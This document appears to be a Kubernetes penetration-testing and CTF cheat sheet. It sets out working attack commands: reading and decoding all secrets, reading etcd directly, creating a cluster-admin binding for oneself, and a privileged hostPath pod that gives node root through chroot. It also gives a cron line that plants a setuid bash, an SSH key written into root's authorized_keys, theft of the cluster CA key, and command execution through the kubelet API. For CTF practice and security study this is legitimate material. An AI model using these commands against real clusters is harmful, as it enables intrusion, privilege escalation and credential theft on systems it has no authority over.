k8s::ctf

pentest kubernetes · container · RBAC
Architecture Setup & Auth Enumeration Secrets RBAC Abuse Pod Escape Service Accounts Network Tools CTF Patterns
Architecture
Control Plane
ComponentRole
kube-apiserverCentral REST API — all kubectl commands hit this
etcdKey-value store — holds ALL cluster state, including secrets
kube-schedulerAssigns pods to nodes
controller-managerRuns control loops (deployments, replicasets…)
Data Plane (each Node)
ComponentRole
kubeletNode agent — runs pods, exposes /metrics, /exec API
kube-proxyNetwork rules (iptables/ipvs)
container runtimecontainerd / docker
/var/lib/kubeletPod specs, credentials, volume mounts on disk
Key API Groups
PathContains
/api/v1Pods, Services, Secrets, ConfigMaps, Namespaces
/apis/apps/v1Deployments, StatefulSets, DaemonSets
/apis/rbac.authorization.k8s.ioRoles, RoleBindings, ClusterRoles
/apis/batch/v1Jobs, CronJobs
/version, /healthzUnauthenticated fingerprinting endpoints
Setup & Authentication
Fix & Use a Kubeconfig
# The server field is often wrong in CTF configs (127.0.0.1)
kubectl config set-cluster default \
  --server=https://<host>:<port> \
  --kubeconfig=./kube.yaml

export KUBECONFIG=./kube.yaml

# Or inline per-command
kubectl --kubeconfig=./kube.yaml get pods
Auth Methods
MethodHow to identify
Client cert (mTLS)client-certificate-data + client-key-data in kubeconfig
Bearer tokentoken: field in kubeconfig, or Authorization: Bearer header
Service account/var/run/secrets/kubernetes.io/serviceaccount/token inside pod
AnonymousNo auth — check if API is open
curl directly (no kubectl)
# Extract certs from base64 kubeconfig fields
echo "<ca_data>" | base64 -d > ca.crt
echo "<cert_data>" | base64 -d > client.crt
echo "<key_data>" | base64 -d > client.key

# Hit the API directly
curl --cacert ca.crt --cert client.crt --key client.key \
  https://<host>:6443/api/v1/namespaces

# With bearer token
curl -k -H "Authorization: Bearer $TOKEN" \
  https://<host>:6443/api/v1/secrets
Auth from inside a Pod
# SA token and cert auto-mounted here
SADIR=/var/run/secrets/kubernetes.io/serviceaccount
TOKEN=$(cat $SADIR/token)
CACERT=$SADIR/ca.crt
HOST=https://kubernetes.default.svc

curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $HOST/api/v1/namespaces
Enumeration
First things to run
# Cluster version / fingerprint
kubectl version
kubectl cluster-info

# What can THIS identity do? (critical first step)
kubectl auth can-i --list
kubectl auth can-i --list -n kube-system

# All namespaces
kubectl get namespaces

# Everything everywhere
kubectl get all --all-namespaces
kubectl get pods,svc,secrets,cm --all-namespaces
Pods & Containers
# List pods with node info
kubectl get pods -o wide --all-namespaces

# Full pod spec (look for: hostPID, hostNetwork,
# privileged, hostPath mounts, env vars, SA)
kubectl describe pod <name>
kubectl get pod <name> -o yaml

# Execute into pod
kubectl exec -it <pod> -- /bin/sh

# Read logs
kubectl logs <pod> --previous
ConfigMaps & Env Vars
# ConfigMaps often hold flags or configs
kubectl get configmaps --all-namespaces
kubectl describe configmap <name>
kubectl get configmap <name> -o yaml

# Env vars injected into a running pod
kubectl exec <pod> -- env

# Full JSON dump of all configmaps
kubectl get cm --all-namespaces -o json | \
  jq '.items[].data'
Secrets
Reading Secrets
# List all secrets
kubectl get secrets --all-namespaces

# Decode a specific secret
kubectl get secret <name> -o jsonpath='{.data}' | \
  python3 -c "import sys,json,base64; \
  [print(k,'=',base64.b64decode(v).decode()) \
  for k,v in json.load(sys.stdin).items()]"

# Dump & decode ALL secrets at once
kubectl get secrets -A -o json | \
  jq -r '.items[] | .metadata.namespace + "/" + \
  .metadata.name + ": " + \
  (.data // {} | to_entries[] | \
  .key + "=" + (.value | @base64d))'
Secret Types to Look For
TypeWhat it holds
OpaqueArbitrary data — flags live here
kubernetes.io/tlstls.crt, tls.key
kubernetes.io/service-account-tokenSA JWT token — can impersonate SA
kubernetes.io/dockerconfigjsonRegistry creds — may have useful tokens
bootstrap.kubernetes.io/tokenBootstrap token — cluster join creds
etcd Direct Read (if you have node access)
# Secrets stored unencrypted in etcd by default
ETCDCTL_API=3 etcdctl --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets/default/ --prefix

# Or find etcd certs on a compromised node
find / -name "etcd" -type f 2>/dev/null
ls /etc/kubernetes/pki/etcd/
RBAC Abuse
Map Permissions
# What can the current user do?
kubectl auth can-i --list

# Specific permission check
kubectl auth can-i get secrets -n kube-system
kubectl auth can-i create pods
kubectl auth can-i impersonate serviceaccounts

# Enumerate all roles and who has them
kubectl get clusterrolebindings -o wide
kubectl get rolebindings -A -o wide

# Inspect a specific role
kubectl describe clusterrole <name>
Dangerous Permissions
PermissionExploit
create podsSpawn privileged pod, mount host FS critical
get/list secretsRead all secrets directly critical
exec into podsCode exec in existing pods high
create/patch deploymentsInject malicious container high
impersonate SABecome high-priv service account critical
update clusterrolebindingsGrant yourself any permission critical
get nodes/proxyCall kubelet API directly high
wildcard (*)Full cluster admin critical
Privilege Escalation via Role Manipulation
# If you can create/update ClusterRoleBindings:
kubectl create clusterrolebinding pwned \
  --clusterrole=cluster-admin \
  --user=$(kubectl config current-context)

# If you can impersonate:
kubectl --as=system:admin get secrets -A
kubectl --as=system:serviceaccount:kube-system:default \
  auth can-i --list
RBAC with kubectl-who-can / rakkess
# rakkess: matrix of all resources vs verbs
kubectl rakkess

# kubectl-who-can: who can do X?
kubectl who-can get secrets
kubectl who-can create pods -n kube-system

# rbac-tool: audit all bindings
kubectl rbac-tool lookup <service-account-name>
kubectl rbac-tool policy-rules -e ".*admin.*"
Pod Escape & Container Breakout
Privileged Pod → Node Root
# If you can CREATE pods, spawn a privileged one
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: escape
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: escape
    image: ubuntu
    securityContext:
      privileged: true
    command: ["/bin/sh", "-c", "sleep 9999"]
    volumeMounts:
    - mountPath: /host
      name: host-root
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF

# Then exec in and chroot to node
kubectl exec -it escape -- chroot /host /bin/bash
# You now have full node root access
Check Container for Escape Conditions
# Am I in a container?
cat /proc/1/cgroup | grep -i "docker\|kubepods"
ls /.dockerenv

# Privileged container?
cat /proc/self/status | grep CapEff
# CapEff: 0000003fffffffff = full caps = privileged

# Host PID namespace?
ls /proc | wc -l  # many procs = host PID

# Writable host path mounted?
mount | grep /host\|/node\|/mnt
cat /proc/mounts
Escape via hostPath + cron
# If /host is mounted, write a cron or SSH key
echo "* * * * * root cp /bin/bash /tmp/b; chmod +s /tmp/b" \
  >> /host/etc/cron.d/escape

# Or write authorized_keys
mkdir -p /host/root/.ssh
echo "<your_pubkey>" >> /host/root/.ssh/authorized_keys

# Or just read the node's flag/secrets directly
cat /host/etc/kubernetes/pki/ca.key  # cluster CA key!
cat /host/var/lib/kubelet/config.yaml
Kubelet API (port 10250)
# Kubelet exposes an API on each node (often open)
# List pods running on that node
curl -sk https://<node-ip>:10250/pods

# Execute command in a container
curl -sk \
  https://<node-ip>:10250/run/<ns>/<pod>/<container> \
  -d "cmd=cat /etc/passwd"

# Read logs
curl -sk \
  https://<node-ip>:10250/containerLogs/<ns>/<pod>/<ctr>
Service Accounts
Enumerate & Steal SA Tokens
# List all service accounts
kubectl get serviceaccounts --all-namespaces

# SA token mounted inside any pod you can exec into
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Decode the JWT to see who you are
cat /var/run/secrets/kubernetes.io/serviceaccount/token | \
  cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool

# Get a token for a specific SA (if you have perms)
kubectl create token <sa-name> -n <namespace>
Use a Stolen SA Token
# Set it in kubeconfig
kubectl config set-credentials attacker \
  --token=<jwt>
kubectl config set-context attacker \
  --cluster=default --user=attacker
kubectl config use-context attacker

# Or just export it
export TOKEN=<jwt>
kubectl --token=$TOKEN get secrets -A

# Impersonate via API flag
kubectl --as=system:serviceaccount:kube-system:default \
  auth can-i --list
Network Recon
Service Discovery
# All services and their ClusterIPs/ports
kubectl get svc --all-namespaces -o wide

# Endpoints (which pods back a service)
kubectl get endpoints --all-namespaces

# DNS from inside a pod: <svc>.<ns>.svc.cluster.local
curl http://<svc-name>.<namespace>.svc.cluster.local

# Port-forward a service to localhost
kubectl port-forward svc/<name> 8080:80 -n <ns>
Common Internal Ports
PortServiceNotes
6443kube-apiserverMain API, TLS
2379-2380etcdRaw secret storage
10250kubeletNode exec API
10255kubelet (ro)Unauthenticated read
8080apiserver (insecure)Old clusters only
179BGP (Calico)Network plugin
Tools
kubectl plugins (krew)
kubectl krew install who-can
kubectl krew install rakkess
kubectl krew install rbac-tool
kubectl krew install sniff      # packet capture
kubectl krew install node-shell  # node shell
kubectl krew install neat        # clean yaml output
Dedicated Audit Tools
ToolUse
kubeauditSecurity audit of manifests & live cluster
kube-benchCIS benchmark checks
kube-hunterActive vuln scanner (good for CTF)
trivyImage + config scanning
peiratesK8s pentest framework
kube-hunter (quick scan)
# Install
pip install kube-hunter

# Scan remote cluster
kube-hunter --remote <host>

# Scan from inside a pod
kube-hunter --pod

# Active mode (actually exploits)
kube-hunter --remote <host> --active
Common CTF Patterns
Decision Tree: Where is the flag?
Got kubeconfig
Fix server addr
auth can-i --list
get secrets -A
decode .data values
No secret perms
exec into pods
read env / SA token
escalate with token
get secrets -A
Can create pods
privileged pod
mount host /
chroot /host
node root
Pattern: Flag in Secret (most common)
# 1. List secrets
kubectl get secrets -A

# 2. Get the suspicious one
kubectl get secret flag -o yaml

# 3. Decode
kubectl get secret flag \
  -o jsonpath='{.data.flag}' | base64 -d
Pattern: Flag in ConfigMap or Env
# ConfigMaps are NOT base64 encoded
kubectl get cm -A -o json | \
  jq '.items[].data'

# Env vars in a running pod
kubectl exec <pod> -- env | grep -i "flag\|CTF\|secret"

# In pod spec (not runtime)
kubectl get pod <pod> -o json | \
  jq '.spec.containers[].env'
Pattern: RBAC Escalation to Secrets
# You can create pods but not read secrets
# Spawn a pod with secret mounted as env
kubectl run reader --image=alpine \
  --env="FLAG_VALUE=$(kubectl get secret flag \
  -o jsonpath='{.data.flag}' | base64 -d)" \
  --restart=Never -- sleep 60

# Or mount the secret as a volume
# in a privileged pod spec
Pattern: Anonymous API Access
# Some clusters allow unauthenticated reads
curl -k https://<host>:6443/api/v1/namespaces
curl -k https://<host>:6443/api/v1/secrets

# Old clusters: insecure port 8080 (no TLS/auth)
curl http://<host>:8080/api/v1/secrets

# Kubelet read-only port 10255
curl http://<node>:10255/pods
curl http://<node>:10255/metrics
One-liner: Dump everything
# Shotgun: dump all useful resources to files
for r in pods secrets configmaps \
         serviceaccounts rolebindings \
         clusterrolebindings deployments; do
  kubectl get $r -A -o yaml > /tmp/$r.yaml
done

# Grep for flag pattern across all
grep -r "picoCTF\|HTB{.\|CTF{" /tmp/*.yaml

# Decode all base64 blobs in secret dumps
grep -oP '(?<=: )[A-Za-z0-9+/=]{20,}' /tmp/secrets.yaml | \
  xargs -I{} bash -c 'base64 -d <<< "{}" 2>/dev/null'
CTF quick checklist:  ① Fix server addr in kubeconfig  → ② auth can-i --list  → ③ get secrets -A + decode  → ④ get configmaps -A  → ⑤ exec into pods + read env/SA token  → ⑥ check RBAC bindings for priv escalation path  → ⑦ if can create pods → privileged + hostPath mount